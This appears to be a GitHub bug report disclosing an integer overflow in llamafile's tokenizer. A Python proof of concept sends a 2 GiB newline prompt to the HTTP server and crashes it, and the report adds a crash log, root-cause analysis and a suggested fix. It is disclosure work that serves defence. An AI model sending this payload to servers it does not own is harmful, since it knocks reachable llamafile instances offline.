
Bug: Integer overflow in llamafile leads to remote DoS #835

@ylwango613

Description

Contact Details

[email protected]

What happened?

Launching llamafile with any GGUF file:

./llamafile --host 0.0.0.0 -m /data/ylwang/Projects/llamafile/test++/0.gguf

Proof of Concept (PoC)

Open another terminal and run:

python3 3.py

where 3.py contains:

import requests

# The prompt is 2,147,483,648 newlines (INT_MAX + 1 bytes); building and
# sending it requires several GiB of client-side memory.
resp = requests.post(
    "http://127.0.0.1:8080/completion",
    json={
        "prompt": "\n" * 2147483648,
        "n_predict": 20
    }
)

print(resp.json())

After a short period, llamafile terminates with:

>>> libc++abi: terminating due to uncaught exception of type std::length_error: vector
error: Uncaught SIGABRT (SI_TKILL) at 0x3f10017a4c2 on XXF-GPU-03 pid 1549506 tid 1549508
  ./llamafile
  No error information
  Linux Cosmopolitan 3.9.7 MODE=x86_64; #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 XXF-GPU-03 5.15.0-140-generic

RAX 0000000000000000 RBX 0000000000000006 RDI 000000000017a4c4
RCX 00000000009ae101 RDX 0000000000000000 RSI 0000000000000006
RBP 00007fcda6d890c0 RSP 00007fcda6d890c0 RIP 00000000009ae101
 R8 0000000000000000  R9 0000000000000000 R10 00000000009ae101
R11 0000000000000296 R12 0000000000b6b4e8 R13 00000000009c3000
R14 0000000000b6b4d0 R15 00007fcda6d893c0
TLS 00007fcda7bebd00

XMM0  00000000000000000000000000000000 XMM8  00000000000000000000000035800000
XMM1  00000000000000000000000000000000 XMM9  755f6e66662e64252e6b6c622e636e65
XMM2  000000000000000000007fcda6d881e0 XMM10 00000000000000000000000000000000
XMM3  726573753e7c74726174735f6d697c3c XMM11 00000000000000000000000000000000
XMM4  000000000000705f6c61636970797412 XMM12 00000000000000000000000000000000
XMM5  00000000000000000000000000000000 XMM13 00000000000000000000000000000000
XMM6  00007a5f7366740a00007fcda6d89530 XMM14 00000000000000000000000000000000
XMM7  00007fcda6d898f000006b5f706f740a XMM15 00000000000000000000000000000000

cosmoaddr2line /data/ylwang/Projects/llamafile/out/bin/llamafile 9ae101 99700b 4078c5 9c2eaa 9c2fae 96f126 96ed52 428bf1 429fdb 458120 4a4c63 574f46 574efb 48599e 47f2a4 44c1af 44337d 521db5 97a384 98c884 9fc9c7

0x00000000009ae101: ?? ??:0
0x000000000099700b: ?? ??:0
0x00000000004078c5: ?? ??:0
0x00000000009c2eaa: ?? ??:0
0x00000000009c2fae: ?? ??:0
0x000000000096f126: ?? ??:0
0x000000000096ed52: ?? ??:0
0x0000000000428bf1: ?? ??:0
0x0000000000429fdb: ?? ??:0
0x0000000000458120: ?? ??:0
0x00000000004a4c63: ?? ??:0
0x0000000000574f46: ?? ??:0
0x0000000000574efb: ?? ??:0
0x000000000048599e: ?? ??:0
0x000000000047f2a4: ?? ??:0
0x000000000044c1af: ?? ??:0
0x000000000044337d: ?? ??:0
0x0000000000521db5: ?? ??:0
0x000000000097a384: ?? ??:0
0x000000000098c884: ?? ??:0
0x00000000009fc9c7: ?? ??:0

000000400000-000000b851e0 r-x-- 7700kb
000000b86000-000003306000 rw--- 40mb
0006fe000000-0006fe001000 rw-pa 4096b
7fc927f05000-7fcb9b305000 rw-pa 10gb
7fcbec905000-7fcc6cb05000 rw-pa 2050mb
7fcd0cd05000-7fcd8efe1fc0 rw-pa 2083mb
7fcd8efe2000-7fcd8f212fc0 rw-pa 2244kb
7fcd8f213000-7fcd8f42ffc0 rw-pa 2164kb
7fcd8f430000-7fcd8f660fc0 rw-pa 2244kb
7fcd8f661000-7fcd90757fc0 rw-pa 17mb
7fcd90758000-7fcd90758fc0 rw-pa 4032b
7fcd90759000-7fcd90759fc0 rw-pa 4032b
7fcd9075a000-7fcd9075afc0 rw-pa 4032b
7fcd9075b000-7fcd9076ffc0 rw-pa 84kb
7fcd90770000-7fcd90770fc0 rw-pa 4032b
# 15'345'442'816 bytes in 26 mappings
./llamafile --host 0.0.0.0 -m /data/ylwang/Projects/llamafile/test++/0.gguf 

The crash log shows a fatal abort caused by an uncaught std::length_error thrown while constructing a std::vector.

Root Cause

In ./llama.cpp/common.cpp:2667, the function llama_tokenize calculates the token buffer size as:

int n_tokens = text.length() + 2 * add_special;
std::vector<llama_token> result(n_tokens);

text.length() returns a size_t (a 64-bit unsigned integer on this platform). With a prompt of 2,147,483,648 characters, text.length() exceeds INT_MAX (2,147,483,647), so assigning it to the 32-bit int n_tokens truncates the value and wraps it to a negative number.

Printing the value inside llamafile confirms:

n_tokens = -2147483648
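
The same narrowing reproduces in a few lines outside llamafile. A minimal standalone sketch (not llamafile code), assuming a typical LP64 target where size_t is 64 bits and int is 32:

#include <cstdio>
#include <cstddef>

int main() {
    // Stand-in for text.length() on a prompt of 2,147,483,648 bytes.
    std::size_t length = 2147483648ULL;
    bool add_special = false;
    // Same arithmetic as common.cpp: the 64-bit count is narrowed to int,
    // wrapping to a negative value on two's-complement targets.
    int n_tokens = length + 2 * add_special;
    std::printf("n_tokens = %d\n", n_tokens); // prints -2147483648
    return 0;
}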

When this negative int is passed to the std::vector constructor, it is implicitly converted back to the vector's unsigned size_type, yielding an enormous value that exceeds max_size(). The constructor therefore throws std::length_error, and because nothing catches the exception, the llamafile process aborts.
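
One possible mitigation, sketched here with a hypothetical helper make_token_buffer (an illustration, not the upstream fix): compute the count in 64 bits and reject prompts that cannot fit in an int before the vector is constructed.

#include <cstdint>
#include <limits>
#include <stdexcept>
#include <string>
#include <vector>

typedef int32_t llama_token; // the token type used by llama.cpp

// Hypothetical helper: size the buffer in 64 bits and refuse prompts
// whose count would overflow a 32-bit int.
std::vector<llama_token> make_token_buffer(const std::string &text,
                                           bool add_special) {
    uint64_t n = static_cast<uint64_t>(text.length()) + (add_special ? 2 : 0);
    if (n > static_cast<uint64_t>(std::numeric_limits<int>::max())) {
        throw std::runtime_error("prompt too long to tokenize");
    }
    return std::vector<llama_token>(static_cast<size_t>(n));
}

A guard like this turns the remote crash into an ordinary error the server can report to the client.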

Impact

A remote, unauthenticated attacker who can reach the HTTP server (here bound to 0.0.0.0) can trigger the overflow with a single oversized prompt, aborting the llamafile process. This is a fully remote denial-of-service condition.

In llama.cpp

In contrast, the standalone llama.cpp server survives the same request: the oversized vector construction still fails, but the failure is handled instead of aborting the process. Sending the equivalent request to a model served directly by llama.cpp:

import requests

# The same 2 GiB prompt, sent to llama.cpp's OpenAI-compatible chat endpoint.
resp = requests.post(
    "http://127.0.0.1:8080/v1/chat/completions",
    json={
        "messages": [
            {"role": "user", "content": "\n" * 2147483648}
        ],
        "max_tokens": 20
    }
)

print(resp.text)

produces a controlled error:

{"error":{"code":500,"message":"cannot create std::vector larger than max_size()","type":"server_error"}}

The message is the standard library's std::length_error text, so the same oversized-vector condition occurs in llama.cpp; the difference is that its server catches the exception and returns a controlled HTTP 500 instead of terminating.
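
That behavior is consistent with the llama.cpp server wrapping request handling in an exception guard. A minimal sketch of the pattern, with hypothetical handle_completion and send_error stand-ins (not llama.cpp's actual code):

#include <cstdio>
#include <stdexcept>
#include <string>

// Hypothetical stand-ins for the real server plumbing.
static void send_error(int code, const std::string &message) {
    std::printf("{\"error\":{\"code\":%d,\"message\":\"%s\",\"type\":\"server_error\"}}\n",
                code, message.c_str());
}

static std::string handle_completion(const std::string &/*body*/) {
    // Simulate the tokenizer failing on an oversized prompt.
    throw std::length_error("cannot create std::vector larger than max_size()");
}

void serve_request(const std::string &body) {
    try {
        std::printf("%s\n", handle_completion(body).c_str());
    } catch (const std::exception &e) {
        // The length_error becomes a controlled 500 response instead of
        // terminating the server process.
        send_error(500, e.what());
    }
}

int main() {
    serve_request("{}");
    return 0;
}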

Version

llamafile v0.9.3

What operating system are you seeing the problem on?

Linux

Relevant log output

See the crash log in the "What happened?" section above.
